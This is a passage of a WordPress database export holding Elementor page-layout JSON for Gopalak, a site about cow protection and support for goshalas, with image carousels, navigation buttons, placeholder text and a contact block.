":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10153,1700,'_elementor_page_assets','a:0:{}'),(10155,1701,'_elementor_edit_mode','builder'),(10156,1701,'_elementor_template_type','wp-page'),(10157,1701,'_elementor_version','3.7.8'),(10158,1701,'_wp_page_template','elementor_canvas'),(10159,1701,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"contain\"},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"},{\"id\":1688,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-karolina-grabowska-4219654-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1692,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-ave-calvar-martinez-3637852-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\"},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1654,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\"},{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1628,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000,\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0300\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 